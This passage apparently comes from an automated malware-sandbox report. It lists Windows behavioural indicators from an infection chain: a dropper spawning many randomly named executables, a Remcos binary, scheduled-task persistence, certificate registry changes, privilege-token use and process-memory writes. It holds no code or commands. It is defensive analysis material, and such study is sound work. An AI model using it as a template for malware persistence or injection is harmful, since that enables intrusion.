Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3588 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3588 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3588 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3588 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 3588 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 3432 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 3432 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 5072 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 5072 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 5072 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 1444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5072 wrote to memory of 1444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5072 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 5072 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 2924 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 2924 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 2924 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 2924 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 2924 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2924 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2924 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3588 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 3588 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 1416 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe
PID 1416 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe
PID 3588 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3588 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3588 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3588 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3588 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3588 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3588 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3588 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3588 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3588 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3588 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 2688 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 2688 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 3588 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3588 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3588 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3588 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 3588 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 3588 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 4804 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe C:\Windows\system32\cmd.exe
PID 4804 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe C:\Windows\system32\cmd.exe
PID 3088 wrote to memory of 3972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3088 wrote to memory of 3972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

